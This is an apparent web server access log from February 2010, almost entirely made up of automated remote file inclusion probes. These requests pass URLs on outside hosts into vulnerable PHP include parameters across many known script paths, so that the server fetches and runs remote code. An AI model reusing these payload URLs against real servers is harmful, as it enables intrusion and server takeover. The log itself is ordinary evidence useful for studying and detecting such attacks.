77.221.130.15 - - [14/Feb/2010:04:28:51 -0800] "GET /logs/access_100118.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [14/Feb/2010:04:29:02 -0800] "GET /logs/access_100115.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:29:05 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:29:09 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:29:15 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:29:17 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:29:17 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:29:17 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:29:20 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:29:23 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:29:24 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:29:45 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:04:29:57 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:04:29:57 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:04:30:00 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:04:30:00 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:04:30:16 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:04:30:20 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:04:30:22 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [14/Feb/2010:04:30:25 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:04:30:50 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [14/Feb/2010:04:30:59 -0800] "GET /logs/access_091217.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:04:32:00 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:34:29 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:34:41 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:35:03 -0800] "GET /logs/access_100122.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:35:15 -0800] "GET /logs/access_100122.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:35:42 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:35:42 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:35:43 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:35:45 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:35:45 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:35:45 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:36:07 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:36:13 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:36:39 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:36:39 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:36:39 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:36:41 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:36:41 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:36:41 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:38:38 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:38:45 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:40:00 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:40:00 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:40:00 -0800] "GET /logs/access_100125.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:04:40:07 -0800] "GET /logs/access_100202.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:40:16 -0800] "GET /logs//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:40:16 -0800] "GET /logs/access_100125.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:40:16 -0800] "GET /errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:04:40:22 -0800] "GET /logs/access_100202.log//errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:40:28 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://chaminyoung.com/gnu_utf8/data/file/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:40:28 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://chaminyoung.com/gnu_utf8/data/file/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:40:28 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://chaminyoung.com/gnu_utf8/data/file/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:04:41:25 -0800] "GET /zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:04:41:25 -0800] "GET /logs//zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:04:41:25 -0800] "GET /logs/access_100111.log//zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:04:41:31 -0800] "GET /logs/access_100123.log//zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [14/Feb/2010:04:42:07 -0800] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [14/Feb/2010:04:42:07 -0800] "GET /logs/access_100126.log//bbs//skin/buzzard_espoon/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [14/Feb/2010:04:42:07 -0800] "GET /bbs//skin/buzzard_espoon/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [14/Feb/2010:04:42:08 -0800] "GET /bbs//skin/buzzard_espoon/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [14/Feb/2010:04:42:08 -0800] "GET /logs/access_100126.log//bbs//skin/buzzard_espoon/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [14/Feb/2010:04:42:08 -0800] "GET /logs//bbs//skin/buzzard_espoon/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:04:42:10 -0800] "GET /zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:04:42:10 -0800] "GET /logs/access_100111.log//zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [14/Feb/2010:04:42:10 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://chaminyoung.com/gnu_utf8/data/file/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:04:42:11 -0800] "GET /logs//zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:04:42:19 -0800] "GET /logs/access_100123.log//zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [14/Feb/2010:04:43:14 -0800] "GET /logs/access_100103.log//bbs//skin/buzzard_espoon/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [14/Feb/2010:04:43:15 -0800] "GET /logs/access_100103.log//bbs//skin/buzzard_espoon/setup.php?dir=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:43:51 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:43:56 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:43:56 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:04:44:09 -0800] "GET /errors.php?error=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:04:44:09 -0800] "GET /logs/access_100201.log//errors.php?error=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [14/Feb/2010:04:44:10 -0800] "GET /logs//errors.php?error=http://www.kenoby.net///class/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:44:10 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:44:10 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:10 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:10 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:11 -0800] "GET /logs/access_100202.log%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:11 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:11 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:11 -0800] "GET /logs/access_100202.log%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:44:13 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:44:16 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:44:16 -0800] "GET /logs/access_100202.log%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:44:27 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:44:28 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:44:28 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:44:33 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:44:33 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:44:34 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:44:34 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:44:34 -0800] "GET /htmltonuke.php?filnavn=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:44:40 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:44:49 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:44:49 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:44:50 -0800] "GET /logs/access_100125.log%20%20/htmltonuke.php?filnavn=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:44:52 -0800] "GET /htmltonuke.php?filnavn=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:44:52 -0800] "GET /logs/access_100115.log%20%20/htmltonuke.php?filnavn=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:44:52 -0800] "GET /logs/htmltonuke.php?filnavn=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:44:53 -0800] "GET /logs/access_100202.log%20%20//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.115.111.242 - - [14/Feb/2010:04:44:57 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.puaga.com"
208.115.111.242 - - [14/Feb/2010:04:44:57 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:59 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:59 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:44:59 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:45:00 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:45:00 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:04:45:00 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:45:02 -0800] "GET /write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:45:02 -0800] "GET /logs//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [14/Feb/2010:04:45:02 -0800] "GET /logs/access_100202.log//write_update.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:45:04 -0800] "GET /logs/access_100125.log%20%20/htmltonuke.php?filnavn=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:45:23 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:45:28 -0800] "GET /zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:45:28 -0800] "GET /logs//zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:45:28 -0800] "GET /logs/access_100111.log//zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [14/Feb/2010:04:45:32 -0800] "GET /registration_detailed.inc.php?mosConfig_absolute_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [14/Feb/2010:04:45:32 -0800] "GET /logs//registration_detailed.inc.php?mosConfig_absolute_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [14/Feb/2010:04:45:38 -0800] "GET /logs/access_100210.log%20%20//registration_detailed.inc.php?mosConfig_absolute_path=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
